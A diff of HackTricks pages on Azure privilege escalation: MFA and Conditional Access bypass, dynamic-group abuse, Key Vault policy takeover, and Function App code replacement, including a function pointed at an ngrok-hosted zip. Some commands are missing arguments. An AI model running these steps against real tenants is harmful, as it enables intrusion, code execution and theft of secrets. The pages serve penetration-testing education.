index c58c50947..498bc7d2a 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
@@ -1,19 +1,6 @@
 # Az - Conditional Access Policies & MFA Bypass
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -33,16 +20,16 @@ When configuring a conditional access policy it's needed to indicate the **users
 
 It's also needed to configure the **conditions** that will **trigger** the policy:
 
-* **Network**: Ip, IP ranges and geographical locations
-  * Can be bypassed using a VPN or Proxy to connect to a country or managing to login from an allowed IP address
-* **Microsoft risks**: User risk, Sign-in risk, Insider risk
-* **Device platforms**: Any device or select Android, iOS, Windows phone, Windows, macOS, Linux
-  * If “Any device” is not selected but all the other options are selected it’s possible to bypass it using a random user-agent not related to those platforms
-* **Client apps**: Option are “Browser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients”
-  * To bypass login with a not selected option
-* **Filter for devices**: It’s possible to generate a rule related the used device
-* A**uthentication flows**: Options are “Device code flow” and “Authentication transfer”
-  * This won’t affect an attacker unless he is trying to abuse any of those protocols in a phishing attempt to access the victims account
+- **Network**: Ip, IP ranges and geographical locations
+  - Can be bypassed using a VPN or Proxy to connect to a country or managing to login from an allowed IP address
+- **Microsoft risks**: User risk, Sign-in risk, Insider risk
+- **Device platforms**: Any device or select Android, iOS, Windows phone, Windows, macOS, Linux
+  - If “Any device” is not selected but all the other options are selected it’s possible to bypass it using a random user-agent not related to those platforms
+- **Client apps**: Option are “Browser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients”
+  - To bypass login with a not selected option
+- **Filter for devices**: It’s possible to generate a rule related the used device
+- A**uthentication flows**: Options are “Device code flow” and “Authentication transfer”
+  - This won’t affect an attacker unless he is trying to abuse any of those protocols in a phishing attempt to access the victims account
 
 The possible **results** are: Block or Grant access with potential conditions like require MFA, device to be compliant…
 
@@ -50,12 +37,12 @@ The possible **results** are: Block or Grant access with potential conditions li
 
 It's possible to set a condition based on the **device platform** (Android, iOS, Windows, macOS...), however, this is based on the **user-agent** so it's easy to bypass. Even **making all the options enforce MFA**, if you use a **user-agent that it isn't recognized,** you will be able to bypass the MFA or block:
 
-

+

 
 Just making the browser **send an unknown user-agent** (like `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) is enough to not trigger this condition.\
 You can change the user agent **manually** in the developer tools:
 
-

+

 
  Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
 
@@ -67,20 +54,18 @@ If this is set in the conditional policy, an attacker could just use a **VPN** i
 
 It's possible to configure **conditional access policies to block or force** for example MFA when a user tries to access **specific app**:
 
-

+

 
 To try to bypass this protection you should see if you can **only into any application**.\
 The tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) has **tens of application IDs hardcoded** and will try to login into them and let you know and even give you the token if successful.
 
 In order to **test specific application IDs in specific resources** you could also use a tool such as:
 
-{% code overflow="wrap" %}
 ```bash
 roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --tokens-stdout
 
 
 ```
-{% endcode %}
 
 Moreover, it's also possible to protect the login method (e.g. if you are trying to login from the browser or from a desktop application). The tool [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) perform some checks to try to bypass this protections also.
 
@@ -94,9 +79,8 @@ The tool [**ROPCI**](https://github.com/wunderwuzzi23/ropci) can also be used to
 
 One Azure MFA option is to **receive a call in the configured phone number** where it will be asked the user to **send the char `#`**.
 
-{% hint style="danger" %}
-As chars are just **tones**, an attacker could **compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail.
-{% endhint %}
+> [!CAUTION]
+> As chars are just **tones**, an attacker could **compromise** the **voicemail** message of the phone number, configure as the message the **tone of `#`** and then, when requesting the MFA make sure that the **victims phone is busy** (calling it) so the Azure call gets redirected to the voice mail.
 
 ### Compliant Devices
 
@@ -116,9 +100,9 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
 
 Find more information about this kind of attack in the following page:
 
-{% content-ref url="../../az-lateral-movement-cloud-on-prem/pass-the-prt.md" %}
-[pass-the-prt.md](../../az-lateral-movement-cloud-on-prem/pass-the-prt.md)
-{% endcontent-ref %}
+{{#ref}}
+../../az-lateral-movement-cloud-on-prem/pass-the-prt.md
+{{#endref}}
 
 ## Tooling
 
@@ -149,9 +133,8 @@ Invoke-MFASweep -Username  -Password 
 
 This tool has helped identify MFA bypasses and then abuse APIs in multiple production AAD tenants, where AAD customers believed they had MFA enforced, but ROPC based authentication succeeded.
 
-{% hint style="success" %}
-You need to have permissions to list all the applications to be able to generate the list of the apps to brute-force.
-{% endhint %}
+> [!TIP]
+> You need to have permissions to list all the applications to be able to generate the list of the apps to brute-force.
 
 ```bash
 ./ropci configure
@@ -179,12 +162,10 @@ Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue
 
 Because the **Azure** **portal** is **not constrained** it's possible to **gather a token from the portal endpoint to access any service detected** by the previous execution. In this case Sharepoint was identified, and a token to access it is requested:
 
-{% code overflow="wrap" %}
 ```powershell
 $token = Get-DelegationTokenFromAzurePortal -credential $cred -token_type microsoft.graph -extension_type Microsoft_Intune
 Read-JWTtoken -token $token.access_token
 ```
-{% endcode %}
 
 Supposing the token has the permission Sites.Read.All (from Sharepoint), even if you cannot access Sharepoint from the web because of MFA, it's possible to use the token to access the files with the generated token:
 
@@ -194,20 +175,7 @@ $data = Get-SharePointFilesFromGraph -authentication $token $data[0].downloadUrl
 
 ## References
 
-* [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s)
-* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
+- [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM&t=296s)
+- [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
new file mode 100644
index 000000000..22061b615
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
@@ -0,0 +1,50 @@
+# Az - Dynamic Groups Privesc
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**.
+
+Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups.
+
+This feature requires Azure AD premium P1 license.
+
+## Privesc
+
+Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes.
+
+Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`**
+
+### Example
+
+- **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")`
+- **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group
+
+For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\
+Unfortunately the page doesn't allow to modify the attribute values so we need to use the API:
+
+```powershell
+# Login with the gust user
+az login --allow-no-subscriptions
+
+# Get user object ID
+az ad signed-in-user show
+
+# Update otherMails
+az rest --method PATCH \
+  --url "https://graph.microsoft.com/v1.0/users/" \
+  --headers 'Content-Type=application/json' \
+  --body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}'
+
+# Verify the update
+az rest --method GET \
+  --url "https://graph.microsoft.com/v1.0/users/" \
+  --query "otherMails"
+```
+
+## References
+
+- [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/)
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
similarity index 79%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
index c2b691c2c..32fee7bad 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
@@ -1,27 +1,14 @@
 # Az - Functions App Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Function Apps
 
 Check the following page for more information:
 
-{% content-ref url="../az-services/az-function-apps.md" %}
-[az-function-apps.md](../az-services/az-function-apps.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-function-apps.md
+{{#endref}}
 
 ### Bucket Read/Write
 
@@ -29,7 +16,7 @@ With permissions to read the containers inside the Storage Account that stores t
 
 Once you find where the code of the function is located if you have write permissions over it you can make the function execute any code and escalate privileges to the managed identities attached to the function.
 
-* **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)`
+- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)`
 
 The code of the function is usually stored inside a file share. With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function.
 
@@ -43,17 +30,15 @@ az functionapp config appsettings list \
 
 Those configs will contain the **Storage Account Key** that the Function can use to access the code.
 
-{% hint style="danger" %}
-With enough permission to connect to the File Share and **modify the script** running it's possible to execute arbitrary code in the Function and escalate privileges.
-{% endhint %}
+> [!CAUTION]
+> With enough permission to connect to the File Share and **modify the script** running it's possible to execute arbitrary code in the Function and escalate privileges.
 
 The following example uses macOS to connect to the file share, but it's recommended to check also the following page for more info about file shares:
 
-{% content-ref url="../az-services/az-file-shares.md" %}
-[az-file-shares.md](../az-services/az-file-shares.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-file-shares.md
+{{#endref}}
 
-{% code overflow="wrap" %}
 ```bash
 # Username is the name of the storage account
 # Password is the Storage Account Key
@@ -63,9 +48,8 @@ The following example uses macOS to connect to the file share, but it's recommen
 
 open "smb://.file.core.windows.net/"
 ```
-{% endcode %}
 
-* **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`)
+- **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`)
 
 It's also common to find the **zip releases** inside the folder `function-releases` of the Storage Account container that the function app is using in a container **usually called `function-releases`**.
 
@@ -79,15 +63,14 @@ az functionapp config appsettings list \
 
 This config will usually contain a **SAS URL to download** the code from the Storage Account.
 
-{% hint style="danger" %}
-With enough permission to connect to the blob container that **contains the code in zip** it's possible to execute arbitrary code in the Function and escalate privileges.
-{% endhint %}
+> [!CAUTION]
+> With enough permission to connect to the blob container that **contains the code in zip** it's possible to execute arbitrary code in the Function and escalate privileges.
 
-* **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)`
+- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)`
 
 Just like in the previous case, if the deployment is done via Github Actions it's possible to find the folder **`github-actions-deploy`** in the Storage Account containing a zip of the code and a SAS URL to the zip in the setting `WEBSITE_RUN_FROM_PACKAGE`.
 
-* **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`)
+- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`)
 
 With permissions to read the containers inside the Storage Account that stores the function data it's possible to find the container **`scm-releases`**. In there it's possible to find the latest release in **Squashfs filesystem file format** and therefore it's possible to read the code of the function:
 
@@ -125,9 +108,8 @@ unsquashfs -d /tmp/fs /tmp/scm-latest-.zip
 
 It's also possible to find the **master and functions keys** stored in the storage account in the container **`azure-webjobs-secrets`** inside the folder **``** in the JSON files you can find inside.
 
-{% hint style="danger" %}
-With enough permission to connect to the blob container that **contains the code in a zip extension file** (which actually is a **`squashfs`**) it's possible to execute arbitrary code in the Function and escalate privileges.
-{% endhint %}
+> [!CAUTION]
+> With enough permission to connect to the blob container that **contains the code in a zip extension file** (which actually is a **`squashfs`**) it's possible to execute arbitrary code in the Function and escalate privileges.
 
 ```bash
 # Modify code inside the script in /tmp/fs adding your code
@@ -148,30 +130,25 @@ az storage blob upload \
 
 This permission allows to list the function, master and system keys, but not the host one, of the specified function with:
 
-{% code overflow="wrap" %}
 ```bash
 az functionapp keys list --resource-group  --name 
 ```
-{% endcode %}
 
 With the master key it's also possible to to get the source code in a URL like:
 
-{% code overflow="wrap" %}
 ```bash
 # Get "script_href" from
 az rest --method GET \
   --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions?api-version=2024-04-01"
 
-# Access 
+# Access
 curl "?code="
 ## Python example:
 curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v
 ```
-{% endcode %}
 
 And to **change the code that is being executed** in the function with:
 
-{% code overflow="wrap" %}
 ```bash
 # Set the code to set in the function in /tmp/function_app.py
 ## The following continues using the python example
@@ -181,70 +158,56 @@ curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwro
 -H "If-Match: *" \
 -v
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/functions/listKeys/action
 
 This permission allows to get the host key, of the specified function with:
 
-{% code overflow="wrap" %}
 ```bash
 az rest --method POST --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//listKeys?api-version=2022-03-01"
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/host/functionKeys/write
 
 This permission allows to create/update a function key of the specified function with:
 
-{% code overflow="wrap" %}
 ```bash
 az functionapp keys set --resource-group  --key-name  --key-type functionKeys --name  --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/host/masterKey/write
 
 This permission allows to create/update a master key to the specified function with:
 
-{% code overflow="wrap" %}
 ```bash
 az functionapp keys set --resource-group  --key-name  --key-type masterKey --name  --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
 ```
-{% endcode %}
 
-{% hint style="danger" %}
-Remember that with this key you can also access the source code and modify it as explained before!
-{% endhint %}
+> [!CAUTION]
+> Remember that with this key you can also access the source code and modify it as explained before!
 
 ### Microsoft.Web/sites/host/systemKeys/write
 
 This permission allows to create/update a system function key to the specified function with:
 
-{% code overflow="wrap" %}
 ```bash
 az functionapp keys set --resource-group  --key-name  --key-type masterKey --name  --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/config/list/action
 
 This permission allows to get the settings of a function. Inside these configurations it might be possible to find the default values **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which contains an **account key to access the blob storage of the function with FULL permissions**.
 
-{% code overflow="wrap" %}
 ```bash
 az functionapp config appsettings list --name  --resource-group 
 ```
-{% endcode %}
 
 Moreover, this permission also allows to get the **SCM username and password** (if enabled) with:
 
-{% code overflow="wrap" %}
 ```bash
 az rest --method POST \
   --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//config/publishingcredentials/list?api-version=2018-11-01"
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write
 
@@ -252,7 +215,7 @@ These permissions allows to list the config values of a function as we have seen
 
 It's therefore possible to set the value of the setting **`WEBSITE_RUN_FROM_PACKAGE`** pointing to an URL zip file containing the new code to execute inside a web application:
 
-* Start by getting the current config
+- Start by getting the current config
 
 ```bash
 az functionapp config appsettings list \
@@ -260,10 +223,10 @@ az functionapp config appsettings list \
   --resource-group 
 ```
 
-* Create the code you want the function to run and host it publicly
+- Create the code you want the function to run and host it publicly
 
 ```bash
-# Write inside /tmp/web/function_app.py the code of the function 
+# Write inside /tmp/web/function_app.py the code of the function
 cd /tmp/web/function_app.py
 zip function_app.zip function_app.py
 python3 -m http.server
@@ -272,11 +235,10 @@ python3 -m http.server
 ngrok http 8000
 ```
 
-* Modify the function, keep the previous parameters and add at the end the config **`WEBSITE_RUN_FROM_PACKAGE`** pointing to the URL with the **zip** containing the code.
+- Modify the function, keep the previous parameters and add at the end the config **`WEBSITE_RUN_FROM_PACKAGE`** pointing to the URL with the **zip** containing the code.
 
 The following is an example of my **own settings you will need to change the values for yours**, note at the end the values `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` , this is where I was hosting the app.
 
-{% code overflow="wrap" %}
 ```bash
 # Modify the function
 az rest --method PUT \
@@ -284,13 +246,11 @@ az rest --method PUT \
   --headers '{"Content-Type": "application/json"}' \
   --body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}'
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/hostruntime/vfs/write
 
 With this permission it's **possible to modify the code of an application** through the web console (or through the following API endpoint):
 
-{% code overflow="wrap" %}
 ```bash
 # This is a python example, so we will be overwritting function_app.py
 # Store in /tmp/body the raw python code to put in the function
@@ -299,7 +259,6 @@ az rest --method PUT \
   --headers '{"Content-Type": "application/json", "If-Match": "*"}' \
   --body @/tmp/body
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)
 
@@ -321,11 +280,10 @@ az functionapp deployment user set \
     --password 'P@ssw0rd123!'
 ```
 
-* If **REDACTED** credentials
+- If **REDACTED** credentials
 
 If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
 
-{% code overflow="wrap" %}
 ```bash
 # Enable basic authentication for SCM
 az rest --method PUT \
@@ -345,9 +303,8 @@ az rest --method PUT \
         }
     }
 ```
-{% endcode %}
 
-* **Method SCM**
+- **Method SCM**
 
 Then, you can access with these **basic auth credentials to the SCM URL** of your function app and get the values of the env variables:
 
@@ -368,7 +325,7 @@ You can also access the web page from `https://.scm.azurewebsites.net/
 
 The settings values contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account.
 
-* **Method FTP**
+- **Method FTP**
 
 Connect to the FTP server using:
 
@@ -392,30 +349,25 @@ _Note that the **FTP username** is usually in the format \\\$\/resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/functions/token/action
 
 With this permission it's possible to [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) which can be later used to retrieve the **master key** and therefore access and modify the function's code:
 
-{% code overflow="wrap" %}
 ```bash
 # Get admin token
 az rest --method POST \
@@ -427,7 +379,6 @@ az rest --method POST \
 curl "https://.azurewebsites.net/admin/host/systemkeys/_master" \
   -H "Authorization: Bearer "
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read)
 
@@ -443,11 +394,9 @@ az functionapp config appsettings set \
 
 It's also possible to see if a function is enabled or disabled in the following URL (using the permission in parenthesis):
 
-{% code overflow="wrap" %}
 ```bash
 az rest --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//properties/state?api-version=2024-04-01"
 ```
-{% endcode %}
 
 ### Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read)
 
@@ -463,14 +412,12 @@ az functionapp config container set --name  \
 
 With these permissions it's possible to **attach a new user managed identity to a function**. If the function was compromised this would allow to escalate privileges to any user managed identity.
 
-{% code overflow="wrap" %}
 ```bash
 az functionapp identity assign \
     --name  \
     --resource-group  \
     --identities /subscriptions//providers/Microsoft.ManagedIdentity/userAssignedIdentities/
 ```
-{% endcode %}
 
 ### Remote Debugging
 
@@ -484,11 +431,9 @@ az functionapp show --name  --resource-group 
 
 Having the permission `Microsoft.Web/sites/config/write` it's also possible to put a function in debugging mode (the following command also requires the permissions `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` and `Microsoft.Web/sites/Read`).
 
-{% code overflow="wrap" %}
 ```bash
 az functionapp config set --remote-debugging-enabled=True --name  --resource-group 
 ```
-{% endcode %}
 
 ### Change Github repo
 
@@ -509,17 +454,4 @@ az functionapp deployment source config \
   --branch main --github-action true
 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
new file mode 100644
index 000000000..700f6e3eb
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
@@ -0,0 +1,34 @@
+# Az - Key Vault Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Key Vault
+
+For more information about this service check:
+
+{{#ref}}
+../az-services/keyvault.md
+{{#endref}}
+
+### Microsoft.KeyVault/vaults/write
+
+An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC).
+
+```bash
+# If access policies in the output, then you can abuse it
+az keyvault show --name 
+
+# Get current principal ID
+az ad signed-in-user show --query id --output tsv
+
+# Assign all permissions
+az keyvault set-policy \
+  --name  \
+  --object-id  \
+  --key-permissions all \
+  --secret-permissions all \
+  --certificate-permissions all \
+  --storage-permissions all
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
similarity index 54%
rename from pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
rename to src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
index 0d92f6fca..af2250673 100644
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
@@ -1,37 +1,22 @@
 # Az - Queue Storage Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Queue
 
 For more information check:
 
-{% content-ref url="../az-services/az-queue-enum.md" %}
-[az-queue-enum.md](../az-services/az-queue-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-services/az-queue-enum.md
+{{#endref}}
 
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read`
 
 An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks.
 
-{% code overflow="wrap" %}
 ```bash
 az storage message peek --queue-name  --account-name 
 ```
-{% endcode %}
 
 **Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
 
@@ -39,27 +24,22 @@ az storage message peek --queue-name  --account-name  --account-name 
 ```
-{% endcode %}
 
